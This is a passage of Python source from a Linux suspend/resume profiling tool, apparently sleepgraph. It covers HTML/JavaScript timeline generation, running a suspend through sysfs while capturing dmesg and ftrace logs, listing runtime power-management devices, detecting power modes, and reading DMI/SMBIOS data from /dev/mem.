.testfail {font:bold 22px Arial;color:red;border:1px dashed;}\n\
td {text-align:center;}\n\
r {color:#500000;font:15px Tahoma;}\n\
n {color:#505050;font:15px Tahoma;}\n\
.tdhl {color:red;}\n\
.hide {display:none;}\n\
.pf {display:none;}\n\
.pf:'+cgchk+' + label {background:url(\'data:image/svg+xml;utf,<?xml version="1.0" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" height="18" width="18" version="1.1"><circle cx="9" cy="9" r="8" stroke="black" stroke-width="1" fill="white"/><rect x="4" y="8" width="10" height="2" style="fill:black;stroke-width:0"/><rect x="8" y="4" width="2" height="10" style="fill:black;stroke-width:0"/></svg>\') no-repeat left center;}\n\
.pf:'+cgnchk+' ~ label {background:url(\'data:image/svg+xml;utf,<?xml version="1.0" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" height="18" width="18" version="1.1"><circle cx="9" cy="9" r="8" stroke="black" stroke-width="1" fill="white"/><rect x="4" y="8" width="10" height="2" style="fill:black;stroke-width:0"/></svg>\') no-repeat left center;}\n\
.pf:'+cgchk+' ~ *:not(:nth-child(2)) {display:none;}\n\
.zoombox {position:relative;width:100%;overflow-x:scroll;-webkit-user-select:none;-moz-user-select:none;user-select:none;}\n\
.timeline {position:relative;font-size:14px;cursor:pointer;width:100%; overflow:hidden;background:linear-gradient(#cccccc, white);}\n\
.thread {position:absolute;height:0%;overflow:hidden;z-index:7;line-height:30px;font-size:14px;border:1px solid;text-align:center;white-space:nowrap;}\n\
.thread.ps {border-radius:3px;background:linear-gradient(to top, #ccc, #eee);}\n\
.thread:hover {background:white;border:1px solid red;'+hoverZ+'}\n\
.thread.sec,.thread.sec:hover {background:black;border:0;color:white;line-height:15px;font-size:10px;}\n\
.hover {background:white;border:1px solid red;'+hoverZ+'}\n\
.hover.sync {background:white;}\n\
.hover.bg,.hover.kth,.hover.sync,.hover.ps {background:white;}\n\
.jiffie {position:absolute;pointer-events: none;z-index:8;}\n\
.traceevent {position:absolute;font-size:10px;z-index:7;overflow:hidden;color:black;text-align:center;white-space:nowrap;border-radius:5px;border:1px solid black;background:linear-gradient(to bottom right,#CCC,#969696);}\n\
.traceevent:hover {color:white;font-weight:bold;border:1px solid white;}\n\
.phase {position:absolute;overflow:hidden;border:0px;text-align:center;}\n\
.phaselet {float:left;overflow:hidden;border:0px;text-align:center;min-height:100px;font-size:24px;}\n\
.t {position:absolute;line-height:'+('%d'%scaleTH)+'px;pointer-events:none;top:0;height:100%;border-right:1px solid black;z-index:6;}\n\
.err {position:absolute;top:0%;height:100%;border-right:3px solid red;color:red;font:bold 14px Times;line-height:18px;}\n\
.legend {position:relative; width:100%; height:40px; text-align:center;margin-bottom:20px}\n\
.legend .square {position:absolute;cursor:pointer;top:10px; width:0px;height:20px;border:1px solid;padding-left:20px;}\n\
button {height:40px;width:200px;margin-bottom:20px;margin-top:20px;font-size:24px;}\n\
.btnfmt {position:relative;float:right;height:25px;width:auto;margin-top:3px;margin-bottom:0;font-size:10px;text-align:center;}\n\
.devlist {position:'+devlistpos+';width:190px;}\n\
a:link {color:white;text-decoration:none;}\n\
a:visited {color:white;}\n\
a:hover {color:white;}\n\
a:active {color:white;}\n\
.version {position:relative;float:left;color:white;font-size:10px;line-height:30px;margin-left:10px;}\n\
#devicedetail {min-height:100px;box-shadow:5px 5px 20px black;}\n\
.tblock {position:absolute;height:100%;background:#ddd;}\n\
.tback {position:absolute;width:100%;background:linear-gradient(#ccc, #ddd);}\n\
.bg {z-index:1;}\n\
'+extra+'\
</style>\n</head>\n<body>\n'
hf.write(html_header)
# Function: addScriptCode
# Description:
# Adds the javascript code to the output html
# Arguments:
# hf: the open html file pointer
# testruns: array of Data objects from parseKernelLog or parseTraceLog
def addScriptCode(hf, testruns):
t0 = testruns[0].start * 1000
tMax = testruns[-1].end * 1000
# create an array in javascript memory with the device details
detail = ' var devtable = [];\n'
for data in testruns:
topo = data.deviceTopology()
detail += ' devtable[%d] = "%s";\n' % (data.testnumber, topo)
detail += ' var bounds = [%f,%f];\n' % (t0, tMax)
# add the code which will manipulate the data in the browser
script_code = \
'<script type="text/javascript">\n'+detail+\
' var resolution = -1;\n'\
' var dragval = [0, 0];\n'\
' function redrawTimescale(t0, tMax, tS) {\n'\
' var rline = \'<div class="t" style="left:0;border-left:1px solid black;border-right:0;">\';\n'\
' var tTotal = tMax - t0;\n'\
' var list = document.getElementsByClassName("tblock");\n'\
' for (var i = 0; i < list.length; i++) {\n'\
' var timescale = list[i].getElementsByClassName("timescale")[0];\n'\
' var m0 = t0 + (tTotal*parseFloat(list[i].style.left)/100);\n'\
' var mTotal = tTotal*parseFloat(list[i].style.width)/100;\n'\
' var mMax = m0 + mTotal;\n'\
' var html = "";\n'\
' var divTotal = Math.floor(mTotal/tS) + 1;\n'\
' if(divTotal > 1000) continue;\n'\
' var divEdge = (mTotal - tS*(divTotal-1))*100/mTotal;\n'\
' var pos = 0.0, val = 0.0;\n'\
' for (var j = 0; j < divTotal; j++) {\n'\
' var htmlline = "";\n'\
' var mode = list[i].id[5];\n'\
' if(mode == "s") {\n'\
' pos = 100 - (((j)*tS*100)/mTotal) - divEdge;\n'\
' val = (j-divTotal+1)*tS;\n'\
' if(j == divTotal - 1)\n'\
' htmlline = \'<div class="t" style="right:\'+pos+\'%"><cS>S→</cS></div>\';\n'\
' else\n'\
' htmlline = \'<div class="t" style="right:\'+pos+\'%">\'+val+\'ms</div>\';\n'\
' } else {\n'\
' pos = 100 - (((j)*tS*100)/mTotal);\n'\
' val = (j)*tS;\n'\
' htmlline = \'<div class="t" style="right:\'+pos+\'%">\'+val+\'ms</div>\';\n'\
' if(j == 0)\n'\
' if(mode == "r")\n'\
' htmlline = rline+"<cS>←R</cS></div>";\n'\
' else\n'\
' htmlline = rline+"<cS>0ms</div>";\n'\
' }\n'\
' html += htmlline;\n'\
' }\n'\
' timescale.innerHTML = html;\n'\
' }\n'\
' }\n'\
' function zoomTimeline() {\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var zoombox = document.getElementById("dmesgzoombox");\n'\
' var left = zoombox.scrollLeft;\n'\
' var val = parseFloat(dmesg.style.width);\n'\
' var newval = 100;\n'\
' var sh = window.outerWidth / 2;\n'\
' if(this.id == "zoomin") {\n'\
' newval = val * 1.2;\n'\
' if(newval > 910034) newval = 910034;\n'\
' dmesg.style.width = newval+"%";\n'\
' zoombox.scrollLeft = ((left + sh) * newval / val) - sh;\n'\
' } else if (this.id == "zoomout") {\n'\
' newval = val / 1.2;\n'\
' if(newval < 100) newval = 100;\n'\
' dmesg.style.width = newval+"%";\n'\
' zoombox.scrollLeft = ((left + sh) * newval / val) - sh;\n'\
' } else {\n'\
' zoombox.scrollLeft = 0;\n'\
' dmesg.style.width = "100%";\n'\
' }\n'\
' var tS = [10000, 5000, 2000, 1000, 500, 200, 100, 50, 20, 10, 5, 2, 1];\n'\
' var t0 = bounds[0];\n'\
' var tMax = bounds[1];\n'\
' var tTotal = tMax - t0;\n'\
' var wTotal = tTotal * 100.0 / newval;\n'\
' var idx = 7*window.innerWidth/1100;\n'\
' for(var i = 0; (i < tS.length)&&((wTotal / tS[i]) < idx); i++);\n'\
' if(i >= tS.length) i = tS.length - 1;\n'\
' if(tS[i] == resolution) return;\n'\
' resolution = tS[i];\n'\
' redrawTimescale(t0, tMax, tS[i]);\n'\
' }\n'\
' function deviceName(title) {\n'\
' var name = title.slice(0, title.indexOf(" ("));\n'\
' return name;\n'\
' }\n'\
' function deviceHover() {\n'\
' var name = deviceName(this.title);\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' var cpu = -1;\n'\
' if(name.match("CPU_ON\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(7));\n'\
' else if(name.match("CPU_OFF\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(8));\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dname = deviceName(dev[i].title);\n'\
' var cname = dev[i].className.slice(dev[i].className.indexOf("thread"));\n'\
' if((cpu >= 0 && dname.match("CPU_O[NF]*\\\[*"+cpu+"\\\]")) ||\n'\
' (name == dname))\n'\
' {\n'\
' dev[i].className = "hover "+cname;\n'\
' } else {\n'\
' dev[i].className = cname;\n'\
' }\n'\
' }\n'\
' }\n'\
' function deviceUnhover() {\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dev[i].className = dev[i].className.slice(dev[i].className.indexOf("thread"));\n'\
' }\n'\
' }\n'\
' function deviceTitle(title, total, cpu) {\n'\
' var prefix = "Total";\n'\
' if(total.length > 3) {\n'\
' prefix = "Average";\n'\
' total[1] = (total[1]+total[3])/2;\n'\
' total[2] = (total[2]+total[4])/2;\n'\
' }\n'\
' var devtitle = document.getElementById("devicedetailtitle");\n'\
' var name = deviceName(title);\n'\
' if(cpu >= 0) name = "CPU"+cpu;\n'\
' var driver = "";\n'\
' var tS = "<t2>(</t2>";\n'\
' var tR = "<t2>)</t2>";\n'\
' if(total[1] > 0)\n'\
' tS = "<t2>("+prefix+" Suspend:</t2><t0> "+total[1].toFixed(3)+" ms</t0> ";\n'\
' if(total[2] > 0)\n'\
' tR = " <t2>"+prefix+" Resume:</t2><t0> "+total[2].toFixed(3)+" ms<t2>)</t2></t0>";\n'\
' var s = title.indexOf("{");\n'\
' var e = title.indexOf("}");\n'\
' if((s >= 0) && (e >= 0))\n'\
' driver = title.slice(s+1, e) + " <t1>@</t1> ";\n'\
' if(total[1] > 0 && total[2] > 0)\n'\
' devtitle.innerHTML = "<t0>"+driver+name+"</t0> "+tS+tR;\n'\
' else\n'\
' devtitle.innerHTML = "<t0>"+title+"</t0>";\n'\
' return name;\n'\
' }\n'\
' function deviceDetail() {\n'\
' var devinfo = document.getElementById("devicedetail");\n'\
' devinfo.style.display = "block";\n'\
' var name = deviceName(this.title);\n'\
' var cpu = -1;\n'\
' if(name.match("CPU_ON\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(7));\n'\
' else if(name.match("CPU_OFF\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(8));\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' var idlist = [];\n'\
' var pdata = [[]];\n'\
' if(document.getElementById("devicedetail1"))\n'\
' pdata = [[], []];\n'\
' var pd = pdata[0];\n'\
' var total = [0.0, 0.0, 0.0];\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dname = deviceName(dev[i].title);\n'\
' if((cpu >= 0 && dname.match("CPU_O[NF]*\\\[*"+cpu+"\\\]")) ||\n'\
' (name == dname))\n'\
' {\n'\
' idlist[idlist.length] = dev[i].id;\n'\
' var tidx = 1;\n'\
' if(dev[i].id[0] == "a") {\n'\
' pd = pdata[0];\n'\
' } else {\n'\
' if(pdata.length == 1) pdata[1] = [];\n'\
' if(total.length == 3) total[3]=total[4]=0.0;\n'\
' pd = pdata[1];\n'\
' tidx = 3;\n'\
' }\n'\
' var info = dev[i].title.split(" ");\n'\
' var pname = info[info.length-1];\n'\
' pd[pname] = parseFloat(info[info.length-3].slice(1));\n'\
' total[0] += pd[pname];\n'\
' if(pname.indexOf("suspend") >= 0)\n'\
' total[tidx] += pd[pname];\n'\
' else\n'\
' total[tidx+1] += pd[pname];\n'\
' }\n'\
' }\n'\
' var devname = deviceTitle(this.title, total, cpu);\n'\
' var left = 0.0;\n'\
' for (var t = 0; t < pdata.length; t++) {\n'\
' pd = pdata[t];\n'\
' devinfo = document.getElementById("devicedetail"+t);\n'\
' var phases = devinfo.getElementsByClassName("phaselet");\n'\
' for (var i = 0; i < phases.length; i++) {\n'\
' if(phases[i].id in pd) {\n'\
' var w = 100.0*pd[phases[i].id]/total[0];\n'\
' var fs = 32;\n'\
' if(w < 8) fs = 4*w | 0;\n'\
' var fs2 = fs*3/4;\n'\
' phases[i].style.width = w+"%";\n'\
' phases[i].style.left = left+"%";\n'\
' phases[i].title = phases[i].id+" "+pd[phases[i].id]+" ms";\n'\
' left += w;\n'\
' var time = "<t4 style=\\"font-size:"+fs+"px\\">"+pd[phases[i].id]+" ms<br></t4>";\n'\
' var pname = "<t3 style=\\"font-size:"+fs2+"px\\">"+phases[i].id.replace(new RegExp("_", "g"), " ")+"</t3>";\n'\
' phases[i].innerHTML = time+pname;\n'\
' } else {\n'\
' phases[i].style.width = "0%";\n'\
' phases[i].style.left = left+"%";\n'\
' }\n'\
' }\n'\
' }\n'\
' if(typeof devstats !== \'undefined\')\n'\
' callDetail(this.id, this.title);\n'\
' var cglist = document.getElementById("callgraphs");\n'\
' if(!cglist) return;\n'\
' var cg = cglist.getElementsByClassName("atop");\n'\
' if(cg.length < 10) return;\n'\
' for (var i = 0; i < cg.length; i++) {\n'\
' cgid = cg[i].id.split("x")[0]\n'\
' if(idlist.indexOf(cgid) >= 0) {\n'\
' cg[i].style.display = "block";\n'\
' } else {\n'\
' cg[i].style.display = "none";\n'\
' }\n'\
' }\n'\
' }\n'\
' function callDetail(devid, devtitle) {\n'\
' if(!(devid in devstats) || devstats[devid].length < 1)\n'\
' return;\n'\
' var list = devstats[devid];\n'\
' var tmp = devtitle.split(" ");\n'\
' var name = tmp[0], phase = tmp[tmp.length-1];\n'\
' var dd = document.getElementById(phase);\n'\
' var total = parseFloat(tmp[1].slice(1));\n'\
' var mlist = [];\n'\
' var maxlen = 0;\n'\
' var info = []\n'\
' for(var i in list) {\n'\
' if(list[i][0] == "@") {\n'\
' info = list[i].split("|");\n'\
' continue;\n'\
' }\n'\
' var tmp = list[i].split("|");\n'\
' var t = parseFloat(tmp[0]), f = tmp[1], c = parseInt(tmp[2]);\n'\
' var p = (t*100.0/total).toFixed(2);\n'\
' mlist[mlist.length] = [f, c, t.toFixed(2), p+"%"];\n'\
' if(f.length > maxlen)\n'\
' maxlen = f.length;\n'\
' }\n'\
' var pad = 5;\n'\
' if(mlist.length == 0) pad = 30;\n'\
' var html = \'<div style="padding-top:\'+pad+\'px"><t3> <b>\'+name+\':</b>\';\n'\
' if(info.length > 2)\n'\
' html += " start=<b>"+info[1]+"</b>, end=<b>"+info[2]+"</b>";\n'\
' if(info.length > 3)\n'\
' html += ", length<i>(w/o overhead)</i>=<b>"+info[3]+" ms</b>";\n'\
' if(info.length > 4)\n'\
' html += ", return=<b>"+info[4]+"</b>";\n'\
' html += "</t3></div>";\n'\
' if(mlist.length > 0) {\n'\
' html += \'<table class=fstat style="padding-top:\'+(maxlen*5)+\'px;"><tr><th>Function</th>\';\n'\
' for(var i in mlist)\n'\
' html += "<td class=vt>"+mlist[i][0]+"</td>";\n'\
' html += "</tr><tr><th>Calls</th>";\n'\
' for(var i in mlist)\n'\
' html += "<td>"+mlist[i][1]+"</td>";\n'\
' html += "</tr><tr><th>Time(ms)</th>";\n'\
' for(var i in mlist)\n'\
' html += "<td>"+mlist[i][2]+"</td>";\n'\
' html += "</tr><tr><th>Percent</th>";\n'\
' for(var i in mlist)\n'\
' html += "<td>"+mlist[i][3]+"</td>";\n'\
' html += "</tr></table>";\n'\
' }\n'\
' dd.innerHTML = html;\n'\
' var height = (maxlen*5)+100;\n'\
' dd.style.height = height+"px";\n'\
' document.getElementById("devicedetail").style.height = height+"px";\n'\
' }\n'\
' function callSelect() {\n'\
' var cglist = document.getElementById("callgraphs");\n'\
' if(!cglist) return;\n'\
' var cg = cglist.getElementsByClassName("atop");\n'\
' for (var i = 0; i < cg.length; i++) {\n'\
' if(this.id == cg[i].id) {\n'\
' cg[i].style.display = "block";\n'\
' } else {\n'\
' cg[i].style.display = "none";\n'\
' }\n'\
' }\n'\
' }\n'\
' function devListWindow(e) {\n'\
' var win = window.open();\n'\
' var html = "<title>"+e.target.innerHTML+"</title>"+\n'\
' "<style type=\\"text/css\\">"+\n'\
' " ul {list-style-type:circle;padding-left:10px;margin-left:10px;}"+\n'\
' "</style>"\n'\
' var dt = devtable[0];\n'\
' if(e.target.id != "devlist1")\n'\
' dt = devtable[1];\n'\
' win.document.write(html+dt);\n'\
' }\n'\
' function errWindow() {\n'\
' var range = this.id.split("_");\n'\
' var idx1 = parseInt(range[0]);\n'\
' var idx2 = parseInt(range[1]);\n'\
' var win = window.open();\n'\
' var log = document.getElementById("dmesglog");\n'\
' var title = "<title>dmesg log</title>";\n'\
' var text = log.innerHTML.split("\\n");\n'\
' var html = "";\n'\
' for(var i = 0; i < text.length; i++) {\n'\
' if(i == idx1) {\n'\
' html += "<e id=target>"+text[i]+"</e>\\n";\n'\
' } else if(i > idx1 && i <= idx2) {\n'\
' html += "<e>"+text[i]+"</e>\\n";\n'\
' } else {\n'\
' html += text[i]+"\\n";\n'\
' }\n'\
' }\n'\
' win.document.write("<style>e{color:red}</style>"+title+"<pre>"+html+"</pre>");\n'\
' win.location.hash = "#target";\n'\
' win.document.close();\n'\
' }\n'\
' function logWindow(e) {\n'\
' var name = e.target.id.slice(4);\n'\
' var win = window.open();\n'\
' var log = document.getElementById(name+"log");\n'\
' var title = "<title>"+document.title.split(" ")[0]+" "+name+" log</title>";\n'\
' win.document.write(title+"<pre>"+log.innerHTML+"</pre>");\n'\
' win.document.close();\n'\
' }\n'\
' function onMouseDown(e) {\n'\
' dragval[0] = e.clientX;\n'\
' dragval[1] = document.getElementById("dmesgzoombox").scrollLeft;\n'\
' document.onmousemove = onMouseMove;\n'\
' }\n'\
' function onMouseMove(e) {\n'\
' var zoombox = document.getElementById("dmesgzoombox");\n'\
' zoombox.scrollLeft = dragval[1] + dragval[0] - e.clientX;\n'\
' }\n'\
' function onMouseUp(e) {\n'\
' document.onmousemove = null;\n'\
' }\n'\
' function onKeyPress(e) {\n'\
' var c = e.charCode;\n'\
' if(c != 42 && c != 43 && c != 45) return;\n'\
' var click = document.createEvent("Events");\n'\
' click.initEvent("click", true, false);\n'\
' if(c == 43) \n'\
' document.getElementById("zoomin").dispatchEvent(click);\n'\
' else if(c == 45)\n'\
' document.getElementById("zoomout").dispatchEvent(click);\n'\
' else if(c == 42)\n'\
' document.getElementById("zoomdef").dispatchEvent(click);\n'\
' }\n'\
' window.addEventListener("resize", function () {zoomTimeline();});\n'\
' window.addEventListener("load", function () {\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' dmesg.style.width = "100%"\n'\
' dmesg.onmousedown = onMouseDown;\n'\
' document.onmouseup = onMouseUp;\n'\
' document.onkeypress = onKeyPress;\n'\
' document.getElementById("zoomin").onclick = zoomTimeline;\n'\
' document.getElementById("zoomout").onclick = zoomTimeline;\n'\
' document.getElementById("zoomdef").onclick = zoomTimeline;\n'\
' var list = document.getElementsByClassName("err");\n'\
' for (var i = 0; i < list.length; i++)\n'\
' list[i].onclick = errWindow;\n'\
' var list = document.getElementsByClassName("logbtn");\n'\
' for (var i = 0; i < list.length; i++)\n'\
' list[i].onclick = logWindow;\n'\
' list = document.getElementsByClassName("devlist");\n'\
' for (var i = 0; i < list.length; i++)\n'\
' list[i].onclick = devListWindow;\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dev[i].onclick = deviceDetail;\n'\
' dev[i].onmouseover = deviceHover;\n'\
' dev[i].onmouseout = deviceUnhover;\n'\
' }\n'\
' var dev = dmesg.getElementsByClassName("srccall");\n'\
' for (var i = 0; i < dev.length; i++)\n'\
' dev[i].onclick = callSelect;\n'\
' zoomTimeline();\n'\
' });\n'\
'</script>\n'
hf.write(script_code);
# Function: executeSuspend
# Description:
# Execute system suspend through the sysfs interface, then copy the output
# dmesg and ftrace files to the test output directory.
def executeSuspend(quiet=False):
sv, tp, pm = sysvals, sysvals.tpath, ProcessMonitor()
if sv.wifi:
wifi = sv.checkWifi()
sv.dlog('wifi check, connected device is "%s"' % wifi)
testdata = []
# run these commands to prepare the system for suspend
if sv.display:
if not quiet:
pprint('SET DISPLAY TO %s' % sv.display.upper())
ret = sv.displayControl(sv.display)
sv.dlog('xset display %s, ret = %d' % (sv.display, ret))
time.sleep(1)
if sv.sync:
if not quiet:
pprint('SYNCING FILESYSTEMS')
sv.dlog('syncing filesystems')
call('sync', shell=True)
sv.dlog('read dmesg')
sv.initdmesg()
# start ftrace
if(sv.usecallgraph or sv.usetraceevents):
if not quiet:
pprint('START TRACING')
sv.dlog('start ftrace tracing')
sv.fsetVal('1', 'tracing_on')
if sv.useprocmon:
sv.dlog('start the process monitor')
pm.start()
sv.dlog('run the cmdinfo list before')
sv.cmdinfo(True)
# execute however many s/r runs requested
for count in range(1,sv.execcount+1):
# x2delay in between test runs
if(count > 1 and sv.x2delay > 0):
sv.fsetVal('WAIT %d' % sv.x2delay, 'trace_marker')
time.sleep(sv.x2delay/1000.0)
sv.fsetVal('WAIT END', 'trace_marker')
# start message
if sv.testcommand != '':
pprint('COMMAND START')
else:
if(sv.rtcwake):
pprint('SUSPEND START')
else:
pprint('SUSPEND START (press a key to resume)')
# set rtcwake
if(sv.rtcwake):
if not quiet:
pprint('will issue an rtcwake in %d seconds' % sv.rtcwaketime)
sv.dlog('enable RTC wake alarm')
sv.rtcWakeAlarmOn()
# start of suspend trace marker
if(sv.usecallgraph or sv.usetraceevents):
sv.fsetVal(datetime.now().strftime(sv.tmstart), 'trace_marker')
# predelay delay
if(count == 1 and sv.predelay > 0):
sv.fsetVal('WAIT %d' % sv.predelay, 'trace_marker')
time.sleep(sv.predelay/1000.0)
sv.fsetVal('WAIT END', 'trace_marker')
# initiate suspend or command
sv.dlog('system executing a suspend')
tdata = {'error': ''}
if sv.testcommand != '':
res = call(sv.testcommand+' 2>&1', shell=True);
if res != 0:
tdata['error'] = 'cmd returned %d' % res
else:
mode = sv.suspendmode
if sv.memmode and os.path.exists(sv.mempowerfile):
mode = 'mem'
sv.testVal(sv.mempowerfile, 'radio', sv.memmode)
if sv.diskmode and os.path.exists(sv.diskpowerfile):
mode = 'disk'
sv.testVal(sv.diskpowerfile, 'radio', sv.diskmode)
if sv.acpidebug:
sv.testVal(sv.acpipath, 'acpi', '0xe')
if mode == 'freeze' and sv.haveTurbostat():
# execution will pause here
turbo = sv.turbostat()
if turbo:
tdata['turbo'] = turbo
else:
pf = open(sv.powerfile, 'w')
pf.write(mode)
# execution will pause here
try:
pf.close()
except Exception as e:
tdata['error'] = str(e)
sv.dlog('system returned from resume')
# reset everything
sv.testVal('restoreall')
if(sv.rtcwake):
sv.dlog('disable RTC wake alarm')
sv.rtcWakeAlarmOff()
# postdelay delay
if(count == sv.execcount and sv.postdelay > 0):
sv.fsetVal('WAIT %d' % sv.postdelay, 'trace_marker')
time.sleep(sv.postdelay/1000.0)
sv.fsetVal('WAIT END', 'trace_marker')
# return from suspend
pprint('RESUME COMPLETE')
if(sv.usecallgraph or sv.usetraceevents):
sv.fsetVal(datetime.now().strftime(sv.tmend), 'trace_marker')
if sv.wifi and wifi:
tdata['wifi'] = sv.pollWifi(wifi)
sv.dlog('wifi check, %s' % tdata['wifi'])
if(sv.suspendmode == 'mem' or sv.suspendmode == 'command'):
sv.dlog('read the ACPI FPDT')
tdata['fw'] = getFPDT(False)
testdata.append(tdata)
sv.dlog('run the cmdinfo list after')
cmdafter = sv.cmdinfo(False)
# stop ftrace
if(sv.usecallgraph or sv.usetraceevents):
if sv.useprocmon:
sv.dlog('stop the process monitor')
pm.stop()
sv.fsetVal('0', 'tracing_on')
# grab a copy of the dmesg output
if not quiet:
pprint('CAPTURING DMESG')
sysvals.dlog('EXECUTION TRACE END')
sv.getdmesg(testdata)
# grab a copy of the ftrace output
if(sv.usecallgraph or sv.usetraceevents):
if not quiet:
pprint('CAPTURING TRACE')
op = sv.writeDatafileHeader(sv.ftracefile, testdata)
fp = open(tp+'trace', 'r')
for line in fp:
op.write(line)
op.close()
sv.fsetVal('', 'trace')
sv.platforminfo(cmdafter)
def readFile(file):
if os.path.islink(file):
return os.readlink(file).split('/')[-1]
else:
return sysvals.getVal(file).strip()
# Function: ms2nice
# Description:
# Print out a very concise time string in minutes and seconds
# Output:
# The time string, e.g. "1901m16s"
def ms2nice(val):
val = int(val)
h = val // 3600000
m = (val // 60000) % 60
s = (val // 1000) % 60
if h > 0:
return '%d:%02d:%02d' % (h, m, s)
if m > 0:
return '%02d:%02d' % (m, s)
return '%ds' % s
def yesno(val):
list = {'enabled':'A', 'disabled':'S', 'auto':'E', 'on':'D',
'active':'A', 'suspended':'S', 'suspending':'S'}
if val not in list:
return ' '
return list[val]
# Function: deviceInfo
# Description:
# Detect all the USB hosts and devices currently connected and add
# a list of USB device names to sysvals for better timeline readability
def deviceInfo(output=''):
if not output:
pprint('LEGEND\n'\
'---------------------------------------------------------------------------------------------\n'\
' A = async/sync PM queue (A/S) C = runtime active children\n'\
' R = runtime suspend enabled/disabled (E/D) rACTIVE = runtime active (min/sec)\n'\
' S = runtime status active/suspended (A/S) rSUSPEND = runtime suspend (min/sec)\n'\
' U = runtime usage count\n'\
'---------------------------------------------------------------------------------------------\n'\
'DEVICE NAME A R S U C rACTIVE rSUSPEND\n'\
'---------------------------------------------------------------------------------------------')
res = []
tgtval = 'runtime_status'
lines = dict()
for dirname, dirnames, filenames in os.walk('/sys/devices'):
if(not re.match('.*/power', dirname) or
'control' not in filenames or
tgtval not in filenames):
continue
name = ''
dirname = dirname[:-6]
device = dirname.split('/')[-1]
power = dict()
power[tgtval] = readFile('%s/power/%s' % (dirname, tgtval))
# only list devices which support runtime suspend
if power[tgtval] not in ['active', 'suspended', 'suspending']:
continue
for i in ['product', 'driver', 'subsystem']:
file = '%s/%s' % (dirname, i)
if os.path.exists(file):
name = readFile(file)
break
for i in ['async', 'control', 'runtime_status', 'runtime_usage',
'runtime_active_kids', 'runtime_active_time',
'runtime_suspended_time']:
if i in filenames:
power[i] = readFile('%s/power/%s' % (dirname, i))
if output:
if power['control'] == output:
res.append('%s/power/control' % dirname)
continue
lines[dirname] = '%-26s %-26s %1s %1s %1s %1s %1s %10s %10s' % \
(device[:26], name[:26],
yesno(power['async']), \
yesno(power['control']), \
yesno(power['runtime_status']), \
power['runtime_usage'], \
power['runtime_active_kids'], \
ms2nice(power['runtime_active_time']), \
ms2nice(power['runtime_suspended_time']))
for i in sorted(lines):
print(lines[i])
return res
# Function: getModes
# Description:
# Determine the supported power modes on this system
# Output:
# A string list of the available modes
def getModes():
modes = []
if(os.path.exists(sysvals.powerfile)):
fp = open(sysvals.powerfile, 'r')
modes = fp.read().split()
fp.close()
if(os.path.exists(sysvals.mempowerfile)):
deep = False
fp = open(sysvals.mempowerfile, 'r')
for m in fp.read().split():
memmode = m.strip('[]')
if memmode == 'deep':
deep = True
else:
modes.append('mem-%s' % memmode)
fp.close()
if 'mem' in modes and not deep:
modes.remove('mem')
if('disk' in modes and os.path.exists(sysvals.diskpowerfile)):
fp = open(sysvals.diskpowerfile, 'r')
for m in fp.read().split():
modes.append('disk-%s' % m.strip('[]'))
fp.close()
return modes
# Function: dmidecode
# Description:
# Read the bios tables and pull out system info
# Arguments:
# mempath: /dev/mem or custom mem path
# fatal: True to exit on error, False to return empty dict
# Output:
# A dict object with all available key/values
def dmidecode(mempath, fatal=False):
out = dict()
# the list of values to retrieve, with hardcoded (type, idx)
info = {
'bios-vendor': (0, 4),
'bios-version': (0, 5),
'bios-release-date': (0, 8),
'system-manufacturer': (1, 4),
'system-product-name': (1, 5),
'system-version': (1, 6),
'system-serial-number': (1, 7),
'baseboard-manufacturer': (2, 4),
'baseboard-product-name': (2, 5),
'baseboard-version': (2, 6),
'baseboard-serial-number': (2, 7),
'chassis-manufacturer': (3, 4),
'chassis-type': (3, 5),
'chassis-version': (3, 6),
'chassis-serial-number': (3, 7),
'processor-manufacturer': (4, 7),
'processor-version': (4, 16),
}
if(not os.path.exists(mempath)):
if(fatal):
doError('file does not exist: %s' % mempath)
return out
if(not os.access(mempath, os.R_OK)):
if(fatal):
doError('file is not readable: %s' % mempath)
return out
# by default use legacy scan, but try to use EFI first
memaddr = 0xf0000
memsize = 0x10000
for ep in ['/sys/firmware/efi/systab', '/proc/efi/systab']:
if not os.path.exists(ep) or not os.access(ep, os.R_OK):
continue
fp = open(ep, 'r')
buf = fp.read()
fp.close()
i = buf.find('SMBIOS=')
if i >= 0:
try:
memaddr = int(buf[i+7:], 16)
memsize = 0x20
except:
continue
# read in the memory for scanning
try:
fp = open(mempath, 'rb')
fp.seek(memaddr)
buf = fp.read(memsize)
except:
if(fatal):
doError('DMI table is unreachable, sorry')
else:
pprint('WARNING: /dev/mem is not readable, ignoring DMI data')
return out
fp.close()
# search for either an SM table or DMI table
i = base = length = num = 0
while(i < memsize):
if buf[i:i+4] == b'_SM_' and i < memsize - 16:
length = struct.unpack('H', buf[i+22:i+24])[0]
base, num = struct.unpack('IH', buf[i+24:i+30])
break
elif buf[i:i+5] == b'_DMI_':
length = struct.unpack('H', buf[i+6:i+8])[0]
base, num = struct.unpack('IH', buf[i+8:i+14])
break
i += 16
if base == 0 and length == 0 and num == 0:
if(fatal):
doError('Neither SMBIOS nor DMI were found')
else:
return out
# read in the SM or DMI table
try:
fp = open(mempath, 'rb')
fp.seek(base)
buf = fp.read(length)
except:
if(fatal):
doError('DMI table is unreachable, sorry')
else:
pprint('WARNING: /dev/mem is not readable, ignoring DMI data')
return out
fp.close()
# scan the table for the values we want
count = i = 0
while(count < num and i <= len(buf) - 4):
type, size, handle = struct.unpack('BBH', buf[i:i+4])
n = i + size
while n < len(buf) - 1:
if 0 == struct.unpack('H', buf[n:n+2])[0]:
break
n += 1
data = buf[i+size:n+2].split(b'\0')
for name in info:
itype, idxadr = info[name]
if itype == type:
idx = struct.unpack('B', buf[i+idxadr:i+idxadr+1])[0]
